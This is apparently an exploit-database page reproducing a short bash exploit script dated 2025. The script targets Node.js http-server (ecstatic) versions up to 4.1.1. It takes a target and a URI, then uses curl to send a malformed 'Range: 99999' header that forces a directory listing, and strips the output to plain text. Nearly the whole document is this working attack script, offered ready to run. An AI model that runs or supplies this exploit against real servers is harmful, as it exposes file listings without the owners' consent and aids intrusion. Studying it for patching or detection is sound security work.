Share
## https://sploitus.com/exploit?id=PACKETSTORM:209541
#!/bin/bash
    
    # Exploit Title: Node.JS <= 4.1.1 http-server (ecstatic) 'Range:' - Directory Listing
    # Date: 2025-09-12
    # Exploit Author: Miguel Redondo (aka d4t4s3c)
    # Vendor Homepage: https://github.com/http-party
    # Software Link: https://github.com/http-party/http-server
    # Version: <= 4.1.1
    # Tested on: Linux
    # Category: Web Application
    # CVE: N/A
    
    while getopts ":t:u:" arg; do
      case $arg in
        t) TARGET=$OPTARG; let parameter_counter+=1 ;;
        u) URI=$OPTARG; let parameter_counter+=1 ;;
      esac
    done
    
    if [ -z "$TARGET" ] || [ -z "$URI" ]; then
      echo -e "\n[i] Usage: ${0} -t <TARGET> -u <URI>\n"
      exit
    else
      echo -e "\n[+] TARGET: ${TARGET}${URI}\n"
      curl -s -H "Range: 99999" ${TARGET}${URI} | html2text | sed '1d;$d'
    fi